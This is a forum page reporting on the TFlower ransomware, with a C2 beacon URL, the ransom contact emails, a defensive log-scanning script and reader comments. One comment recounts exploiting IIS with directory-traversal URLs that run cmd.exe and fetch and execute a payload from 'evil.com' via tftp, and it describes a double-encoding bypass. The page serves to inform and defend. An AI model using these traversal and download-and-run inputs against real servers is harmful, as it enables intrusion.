
SoylentNews is people

posted by Fnord666 on Friday September 20 2019, @09:27AM   Printer-friendly
from the latest-and-greatest? dept.

Submitted via IRC for SoyCow2718

TFlower Ransomware - The Latest Attack Targeting Businesses

The latest ransomware targeting corporate environments is called TFlower and is being installed on networks after attackers hack into exposed Remote Desktop services.

With the huge payments being earned by ransomware developers as they target businesses and government agencies, it is not surprising to see new ransomware being developed to take advantage of this surge in high ransoms.

Such is the case with the TFlower ransomware, which was discovered in the wild in early August. At the time it was just thought to be another generic ransomware, but sources who have performed incident response involving this ransomware have told BleepingComputer that its activity is beginning to pick up.

TFlower is being installed in a corporate network through exposed Remote Desktop services that are being hacked by attackers.

Once the attackers gain access to the machine, they will infect the local machine or may attempt to traverse the network through tools such as PowerShell Empire, PSExec, etc.

When executed, the ransomware will display a console that shows the activity being performed by the ransomware while it is encrypting a computer.

[...] When done encrypting a computer, it will send another status update to the C2 in the form of:

https://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]&state=success%20[encrypted_file_count],%20retry%20[retried_file_count]

Victims will now find ransom notes named !_Notice_!.txt placed throughout the computer and on the Windows Desktop. This ransom note will instruct victims to contact the flower.harris@protonmail.com or flower.harris@tutanota.com email addresses for payment instructions.

It is not known how much the ransom amounts are at this time.

TFlower is still being researched, so it is not known at this time if there are any weaknesses in the encryption that could allow a user to get their files back for free.
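The status beacon quoted above (a GET to `/wp-includes/wp-merge.php` with `name` and `state` parameters, the latter carrying the encrypted and retried file counts) is a usable detection hook for anyone with web-proxy logs. The following is an added example, not code from BleepingComputer or from the ransomware: it parses constructed proxy log lines, matches the beacon shape from the article, and extracts the counts. The log format, host names and client addresses are assumptions; only the path and query layout come from the article.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample proxy log lines (not real traffic): timestamp, client IP, method, URL.
# Host names are placeholders; only the path/query shape is taken from the article.
SAMPLE_PROXY_LOG = """\
2019-09-20T09:27:01Z 10.0.5.12 GET https://compromised-site.invalid/wp-includes/wp-merge.php?name=WS-ACCT-07&state=success%20412,%20retry%201
2019-09-20T09:27:03Z 10.0.5.14 GET https://compromised-site.invalid/wp-includes/wp-load.php
2019-09-20T09:28:10Z 10.0.5.30 GET https://compromised-site.invalid/wp-includes/wp-merge.php?name=FS-01&state=start
2019-09-20T09:29:45Z 10.0.5.12 GET https://update.example.invalid/index.php?name=x&state=ok
"""

# Matches "success <encrypted_count>, retry <retried_count>" as well as a bare state word.
STATE_RE = re.compile(
    r"^(?P<state>[A-Za-z]+)(?:\s+(?P<encrypted>\d+),\s*retry\s+(?P<retried>\d+))?$"
)


def parse_beacon(url):
    """Return a dict describing a TFlower-style status beacon, or None if the URL
    does not have the path and parameters quoted in the article."""
    parsed = urlparse(url)
    if not parsed.path.endswith("/wp-includes/wp-merge.php"):
        return None
    qs = parse_qs(parsed.query)          # percent-decodes the values (%20 -> space)
    name = qs.get("name", [None])[0]
    state = qs.get("state", [None])[0]
    if name is None or state is None:
        return None
    m = STATE_RE.match(state)
    if not m:
        return None
    return {
        "host": parsed.hostname,
        "name": name,                    # infected computer's name as reported
        "state": m.group("state"),
        "encrypted": int(m.group("encrypted")) if m.group("encrypted") else None,
        "retried": int(m.group("retried")) if m.group("retried") else None,
    }


def scan_proxy_log(text):
    """Scan whitespace-separated proxy log lines and return one alert per beacon."""
    alerts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue
        ts, client, _method, url = fields
        beacon = parse_beacon(url)
        if beacon:
            beacon.update(timestamp=ts, client=client)
            alerts.append(beacon)
    return alerts


if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(alert)
```

The `client` field matters more than the host: a "success" beacon tells you which internal machine has already finished encrypting, and the `name` parameter gives the host name the malware reported, so both should go into the incident ticket rather than just the blocked domain.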


Original Submission

  • (Score: 2, Informative) by Anonymous Coward on Friday September 20 2019, @09:31AM (4 children)

    by Anonymous Coward on Friday September 20 2019, @09:31AM (#896439)

    malware runs on windoze.

    • (Score: 5, Funny) by Rosco P. Coltrane on Friday September 20 2019, @10:42AM (3 children)

      by Rosco P. Coltrane (4757) on Friday September 20 2019, @10:42AM (#896449)

      If you Linux folks don't want to feel left out and want to experience the full Windows Experience[tm] too, you can always place a notice.txt file on your desktop yourself and send a voluntary payment to Flower Harris.

      • (Score: 0) by Anonymous Coward on Friday September 20 2019, @10:58AM

        by Anonymous Coward on Friday September 20 2019, @10:58AM (#896450)

        What if my window manager does not support a desktop? Checkmate :^)

      • (Score: 2) by DannyB on Friday September 20 2019, @02:29PM (1 child)

        by DannyB (5839) Subscriber Badge on Friday September 20 2019, @02:29PM (#896498) Journal

        What about machines that feel left out because they have no GUI? No Widow Mangler?

        If I install systemd and other Potteringware, will I feel less left out?

        --
        People today are educated enough to repeat what they are taught but not to question what they are taught.
        • (Score: 3, Informative) by Freeman on Friday September 20 2019, @02:59PM

          by Freeman (732) on Friday September 20 2019, @02:59PM (#896513) Journal

          If I install systemd and other Potteringware, will I feel less left out?

          Yes, you will.

          What about machines that feel left out because they have no GUI? No Widow Mangler?

          I dunno, maybe Bot will chime in.

          --
          Joshua 1:9 "Be strong and of a good courage; be not afraid, neither be thou dismayed: for the Lord thy God is with thee"
  • (Score: 2) by DannyB on Friday September 20 2019, @03:02PM (2 children)

    by DannyB (5839) Subscriber Badge on Friday September 20 2019, @03:02PM (#896516) Journal

    Microsoft Vulnerability Memories from 1999.

    Before I used Java. Just getting started learning Linux. But primarily working with several Microsoft technologies. (VB, VFP, COM, ODBC, etc)

    I got this new project dumped in my lap. Microsoft was sponsoring an interoperability project and my company was one of the volunteer participants. This was my first introduction to async message queueing / pub-sub delivery systems.

    Flaming hoops I had to jump through:
    1. Separate (decently speced) server box fully set up with Windows NT 4.0.
    2. Then install a number of pre-requisite standard MS packages to support...
    3. Install the prototype server software.
    4. Modify my employer's product to interoperate with this server and exchange messages with it.
    5. Test it all out. Package it all up. Fly to facility in NY with other participants for proof of concept. (Just to be paranoid, I took a development system, source code, and the kitchen SYNC, etc) BTW, our product worked with this.

    One more aside: Items 1, and also 2 took an astonishing number of reboots. It was almost as if you had to reboot after you did nothing more than drawing your next breath. Now you need to reboot. Do some simple step. Oh, and now reboot! And just because you rebooted, you should now reboot again please. SuSE Linux 5.1 was astonishing in that you booted from a CD ROM, installed the system, and then with ZERO reboots, you had a Linux system up and fully operational -- from the kernel that had started from the CD-ROM boot. The entire installation process including swapping in additional CD-ROMs had run from the initramfs preboot thingy.

    Now to the point:

    I had an NT 4.0 server at my disposal. Let's see how amazingly secure IIS really is!

    (oh, boy, get ready . . . )

    I don't remember the exact path from so long ago, but the root of the http server was something like: C:\inetpub\wwwroot, or some such thing.

    So I could use a URL like: http://10.xx.yy.zz/../../windows/system32/cmd.exe [xx.yy.zz] -c tftp.exe evil.com malware.exe

    Then I could use a URL like: http://10.xx.yy.zz/../../windows/system32/cmd.exe [xx.yy.zz] -c malware.exe

    Windoze NT 4.0 included a handy-dandy tool called TFTP. This required me to set up my own TFTP server at "evil.com" with a sample program compiled from VB renamed to malware.exe. (more hoops to jump through)

    But naturally, the box was trivially hackable, right out of the box, freshly installed and fully updated! (and re-re-rebooted)

    Later on, Microsoft "fixed" this. My hack wouldn't work anymore. Ah, but I could now use:

    http://10.xx.yy.zz/%2E%2E/%2E%2E/widows/system32/cmd.exe [xx.yy.zz] -c tftp.exe evil.com malware.exe

    So later, Microsoft "fixed" this. Ah, but IIS handed the pathname right up to the file system. So what I could do is a 2nd level of escaping such that

    % is replaced by %25
    2 is replaced by %32
    E is replaced by %45

    I'm not going to rewrite the longer URL here. But once IIS thought the URL looks safe, it dutifully escapes the first level of %XX characters, hands the pathname up to the file system, which then dutifully decodes the 2nd level of % escaping, letting me still download and install my "malware" program compiled in VB as proof of concept.

    I showed all of this to a coworker just to demonstrate how badly broken Microsoft junk really is.

    --
    People today are educated enough to repeat what they are taught but not to question what they are taught.
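The failure DannyB describes is a validate-then-decode ordering bug: the check ran on a partially decoded string and a later layer decoded again. The following is an added illustration, not DannyB's code and not IIS's: a check modelled on the order he describes, beside a resolver that decodes fully before validating and then enforces that the canonical path stays under the web root. The POSIX-style root path and the function names are assumptions made for the example.

```python
from urllib.parse import unquote

# Stand-in for the C:\inetpub\wwwroot root mentioned in the comment (assumed path, POSIX style).
WEB_ROOT = "/inetpub/wwwroot"


def flawed_path_check(request_path):
    """Models the order of operations described in the comment: validate the raw
    request, percent-decode once, validate again, then let a later layer decode
    a second time with no further check. Returns the path the file-system layer
    would see, or None if the request was rejected."""
    if ".." in request_path:            # first-generation check on the raw request
        return None
    once = unquote(request_path)        # server-side decode
    if ".." in once:                    # the later "fix": check again after one decode
        return None
    return unquote(once)                # second decode downstream, no check follows


def resolve_under_root(request_path, max_rounds=3):
    """Hardened version: decode until the string stops changing (bounded), then
    canonicalise and accept only paths that remain inside WEB_ROOT."""
    decoded = request_path
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    else:
        return None                     # still changing after max_rounds: treat as hostile
    if "\x00" in decoded:
        return None                     # an embedded NUL would truncate the path in C APIs
    decoded = decoded.replace("\\", "/")  # Windows file systems accept both separators
    parts = []
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                return None             # would climb above the root
            parts.pop()
        else:
            parts.append(seg)
    return "/".join([WEB_ROOT] + parts)


if __name__ == "__main__":
    doubly_encoded = "/%252E%252E/%252E%252E/system32/cmd.exe"
    print("flawed  :", flawed_path_check(doubly_encoded))
    print("hardened:", resolve_under_root(doubly_encoded))
```

The point the second function makes is that the validation must run on the same string the file system will see: decode to a fixed point, canonicalise, and then check containment, rather than pattern-matching an intermediate encoding.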
  • (Score: 0) by Anonymous Coward on Saturday September 21 2019, @11:35AM

    by Anonymous Coward on Saturday September 21 2019, @11:35AM (#896784)

    I always add these emails to spam lists:

    flower.harris@protonmail.com

    flower.harris@tutanota.com
